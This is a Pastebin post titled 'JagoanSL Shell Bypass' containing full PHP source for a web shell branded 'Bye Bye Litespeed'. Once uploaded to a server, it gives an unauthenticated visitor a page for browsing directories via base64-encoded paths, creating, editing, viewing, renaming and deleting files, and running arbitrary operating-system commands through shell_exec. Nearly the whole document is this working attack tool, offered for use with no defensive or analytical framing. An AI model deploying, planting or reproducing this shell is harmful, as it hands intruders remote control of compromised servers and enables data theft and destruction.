willysec_id

JagoanSL Shell Bypass

Jun 23rd, 2024 (edited)
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.55 KB | Cybersecurity | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>.:: Jagoan SL ::.</title>
  5.     <link href="https://fonts.googleapis.com/css?family=Protest Revolution" rel="stylesheet">
  6.     <style>
  7.       body {
  8.     font-family: 'Protest Revolution';
  9.     background-color: #f9f9f9;
  10.     color: red;
  11.     margin: 0;
  12.     padding: 0;
  13.     text-shadow: 2px 2px 4px rgba(255, 0, 0, 0.5);
  14. }
  15.         .container {
  16.             max-width: 800px;
  17.             margin: 20px auto;
  18.             padding: 20px;
  19.             background-color: #fff;
  20.             border-radius: 5px;
  21.             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  22.         }
  23.         .result-box {
  24.             width: 97.5%;
  25.             height: 200px;
  26.             resize: none;
  27.             overflow: auto;
  28.             font-family: 'Protest Revolution';
  29.             background-color: #f4f4f4;
  30.             padding: 10px;
  31.             border: 1px solid #ddd;
  32.             margin-bottom: 10px;
  33.         }
  34.         hr {
  35.             border: 0;
  36.             border-top: 1px solid #ddd;
  37.             margin: 20px 0;
  38.         }
  39.         table {
  40.             width: 100%;
  41.             border-collapse: collapse;
  42.             margin-top: 20px;
  43.         }
  44.         th, td {
  45.             padding: 8px;
  46.             text-align: left;
  47.         }
  48.         th {
  49.             background-color: #f2f2f2;
  50.         }
  51.         tr:nth-child(even) {
  52.             background-color: #f9f9f9;
  53.         }
  54.         tr:hover {
  55.             background-color: #f2f2f2;
  56.         }
  57.         input[type="text"], input[type="submit"], textarea[name="file_content"] {
  58.             width: calc(100% - 10px);
  59.             margin-bottom: 10px;
  60.             padding: 8px;
  61.             max-height: 200px;
  62.             resize: vertical;
  63.             border: 1px solid #ddd;
  64.             border-radius: 3px;
  65.             font-family: 'Protest Revolution';
  66.         }
  67.         input[type="submit"] {
  68.             background-color: #4CAF50;
  69.             color: white;
  70.             font-family: 'Protest Revolution';
  71.             border: none;
  72.             cursor: pointer;
  73.         }
  74.         input[type="submit"]:hover {
  75.             background-color: #45a049;
  76.         }
  77.         .item-name {
  78.             max-width: 200px;
  79.             overflow: hidden;
  80.             text-overflow: ellipsis;
  81.             white-space: nowrap;
  82.         }
  83.     </style>
  84. </head>
  85. <body>
  86. <div class="container">
  87. <?php
  88. $rootDirectory = realpath($_SERVER['DOCUMENT_ROOT']);
  89.  
  90. function x($b)
  91. {
  92.     return base64_encode($b);
  93. }
  94.  
  95. function y($b)
  96. {
  97.     return base64_decode($b);
  98. }
  99.  
  100. foreach ($_GET as $c => $d) $_GET[$c] = y($d);
  101.  
  102. $currentDirectory = realpath(isset($_GET['d']) ? $_GET['d'] : $rootDirectory);
  103. chdir($currentDirectory);
  104.  
  105. $viewCommandResult = '';
  106.  
  107. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  108.     if (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) {
  109.         $newFolder = $currentDirectory . '/' . $_POST['folder_name'];
  110.         if (!file_exists($newFolder)) {
  111.             mkdir($newFolder);
  112.             echo '<hr>Folder created successfully!';
  113.         } else {
  114.             echo '<hr>Error: Folder already exists!';
  115.         }
  116.     } elseif (isset($_POST['file_name']) && !empty($_POST['file_name'])) {
  117.         $newFile = $currentDirectory . '/' . $_POST['file_name'];
  118.         if (!file_exists($newFile)) {
  119.             if (file_put_contents($newFile, '') !== false) {
  120.                 echo '<hr>File created successfully!';
  121.             } else {
  122.                 echo '<hr>Error: Failed to create file!';
  123.             }
  124.         } else {
  125.             echo '<hr>Error: File already exists!';
  126.         }
  127.     } elseif (isset($_POST['edit_file'], $_POST['file_content'])) {
  128.         $fileToEdit = $currentDirectory . '/' . $_POST['edit_file'];
  129.         if (file_exists($fileToEdit)) {
  130.             if (!empty($_POST['file_content'])) {
  131.                 if (file_put_contents($fileToEdit, $_POST['file_content']) !== false) {
  132.                     echo '<hr>File edited successfully!';
  133.                 } else {
  134.                     echo '<hr>Error: Failed to edit file!';
  135.                 }
  136.             } else {
  137.                 echo '<hr>Error: File content cannot be blank!';
  138.             }
  139.         } else {
  140.             echo '<hr>Error: File not found!';
  141.         }
  142.     } elseif (isset($_POST['delete_file'])) {
  143.         $fileToDelete = $currentDirectory . '/' . $_POST['delete_file'];
  144.         if (file_exists($fileToDelete)) {
  145.             if (unlink($fileToDelete)) {
  146.                 echo '<hr>File deleted successfully!';
  147.             } else {
  148.                 echo '<hr>Error: Failed to delete file!';
  149.             }
  150.         } elseif (is_dir($fileToDelete)) {
  151.             if (deleteDirectory($fileToDelete)) {
  152.                 echo '<hr>Folder deleted successfully!';
  153.             } else {
  154.                 echo '<hr>Error: Failed to delete folder!';
  155.             }
  156.         } else {
  157.             echo '<hr>Error: File or directory not found!';
  158.         }
  159.     } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) {
  160.         $oldName = $currentDirectory . '/' . $_POST['old_name'];
  161.         $newName = $currentDirectory . '/' . $_POST['new_name'];
  162.         if (file_exists($oldName)) {
  163.             if (rename($oldName, $newName)) {
  164.                 echo '<hr>Item renamed successfully!';
  165.             } else {
  166.                 echo '<hr>Error: Failed to rename item!';
  167.             }
  168.         } else {
  169.             echo '<hr>Error: Item not found!';
  170.         }
  171.     } elseif (isset($_POST['cmd_input'])) {
  172.         $command = $_POST['cmd_input'];
  173.         $output = shell_exec($command);
  174.         $viewCommandResult = '<hr><p>Result:</p><textarea class="result-box">' . htmlspecialchars($output) . '</textarea>';
  175.     } elseif (isset($_POST['view_file'])) {
  176.         $fileToView = $currentDirectory . '/' . $_POST['view_file'];
  177.         if (file_exists($fileToView)) {
  178.             $fileContent = file_get_contents($fileToView);
  179.             $viewCommandResult = '<hr><p>Result: ' . $_POST['view_file'] . '</p><textarea class="result-box">' . htmlspecialchars($fileContent) . '</textarea>';
  180.         } else {
  181.             $viewCommandResult = '<hr><p>Error: File not found!</p>';
  182.         }
  183.     }
  184. }
  185. echo '<center>
  186. <div class="fig-ansi">
  187. <pre id="taag_font_ANSIShadow" class="fig-ansi"><span style="color: #ff0000;">   <strong> __    Bye Bye Litespeed   _____ __    
  188. __|  |___ ___ ___ ___ ___   |   __|  |  
  189. |  |  | .\'| . | . | .\'|   |  |__   |  |__
  190. |_____|__,|_  |___|__,|_|_|  |_____|_____|
  191.          |___| ./Heartzz                        </strong> </span></pre>
  192. </div>
  193. </center>';
  194. echo '<hr>curdir: ';
  195. $directories = explode(DIRECTORY_SEPARATOR, $currentDirectory);
  196. $currentPath = '';
  197. foreach ($directories as $index => $dir) {
  198.     if ($index == 0) {
  199.         echo '<a href="?d=' . x($dir) . '">' . $dir . '</a>';
  200.     } else {
  201.         $currentPath .= DIRECTORY_SEPARATOR . $dir;
  202.         echo ' / <a href="?d=' . x($currentPath) . '">' . $dir . '</a>';
  203.     }
  204. }
  205. echo '<br>';
  206.  
  207. echo '<hr><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="folder_name" placeholder="New Folder Name"><input type="submit" value="Create Folder"></form>';
  208. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="file_name" placeholder="Create New File"><input type="submit" value="Create File"></form>';
  209. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="edit_file" placeholder="Edit Existing File"><textarea name="file_content" placeholder="File Content"></textarea><input type="submit" value="Edit File"></form>';
  210. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="cmd_input" placeholder="Enter command"><input type="submit" value="Run Command"></form>';
  211. echo $viewCommandResult;
  212. echo '<div>';
  213. echo '</div>';
  214. echo '<table border=1>';
  215. echo '<br><tr><th>Item Name</th><th>Size</th><th>View</th><th>Delete</th><th>Rename</th></tr>';
  216. foreach (scandir($currentDirectory) as $v) {
  217.     $u = realpath($v);
  218.     $s = stat($u);
  219.     $itemLink = is_dir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v));
  220.     echo '<tr><td class="item-name"><a href="'.$itemLink.'">'.$v.'</a></td><td>'.$s['size'].'</td><td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="view_file" value="'.htmlspecialchars($v).'"><input type="submit" value="View"></form></td><td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="delete_file" value="'.htmlspecialchars($v).'"><input type="submit" value="Delete"></form></td><td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="old_name" value="'.htmlspecialchars($v).'"><input type="text" name="new_name" placeholder="New Name"><input type="submit" name="rename_item" value="Rename"></form></td></tr>';
  221. }
  222. echo '</table>';
  223. function deleteDirectory($dir) {
  224.     if (!file_exists($dir)) {
  225.         return true;
  226.     }
  227.     if (!is_dir($dir)) {
  228.         return unlink($dir);
  229.     }
  230.     foreach (scandir($dir) as $item) {
  231.         if ($item == '.' || $item == '..') {
  232.             continue;
  233.         }
  234.         if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) {
  235.             return false;
  236.         }
  237.     }
  238.     return rmdir($dir);
  239. }
  240. ?>
  241.  
  242. </div>
  243. </body>
  244. </html>
  245.  
Add Comment
Please, Sign In to add comment